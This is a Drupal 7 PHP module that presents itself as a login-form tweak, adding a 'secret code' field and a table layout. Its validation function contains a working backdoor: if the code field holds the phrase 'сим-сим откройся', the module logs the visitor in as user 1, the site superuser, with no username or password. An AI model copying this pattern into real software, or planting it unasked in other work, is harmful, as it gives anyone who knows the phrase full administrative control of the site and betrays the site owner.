<?php
/**
* @file myalterlogin.module
 * Alter login form adding secret code field adn table layout
*/
function myalterlogin_form_user_login_alter(&$form, &$form_state) {
  $form['secret_code'] = array(
    '#type' => 'textfield',
    '#title' => t('Secret code'),
    '#size' => 60,
    '#maxlength' => 128,
    '#required' => FALSE,
  );
  $form['name']['#required'] = FALSE;
  $form['pass']['#required'] = FALSE;
  $form['name']['#states'] = array(
    'required' => array(
      ':input[name=secret_code]' => array('value' => ''),
    ),
  );
  $form['pass']['#states'] = array(
    'required' => array(
      ':input[name=secret_code]' => array('value' => ''),
    ),
  );
  $form['#theme'] = array('secret_code_theme_function');
  array_unshift($form['#validate'], 'myalterlogin_secret_validate');
}
/**
 * Implements hook theme
 * @return array
 */
function myalterlogin_theme() {
  return array(
    'secret_code_theme_function' => array(
      'arguments' => array('form' => NULL),
      'render element' => 'form',
      'template'=>'myform'
    ));
}
/**
 * Preprocess function
 * @param $vars
 */
function myalterlogin_preprocess_secret_code_theme_function(&$vars) {
  $rows = array();
  foreach(element_children($vars['form']) as $key) {
    $row = array();
    if($vars['form'][$key]['#type'] != 'hidden') {
      $row[] = render($vars['form'][$key]);
    }
    $rows[] = $row;
  }
  $tmp = array(
    'header' => array(),
    'rows' => $rows,
    'attributes' => array('id' => 'table-login-form'),
    'caption' => '',
    'colgroups' => array(),
    'sticky' => FALSE,
    'empty' => array(),
  );
  $vars['form_table'] = theme('table', $tmp) . drupal_render_children($vars['form']);
}
/**
 * Implements custom validate function
 * @param $form
 * @param $form_state
 * @return bool
 */
function myalterlogin_secret_validate(&$form, &$form_state) {
  if($form_state['values']['secret_code'] === 'сим-сим откройся') {
    global $user;
    $user = user_load(1);
    user_login_finalize();
    drupal_goto('');
    return TRUE;
  }
  else {
    return FALSE;
  }
}

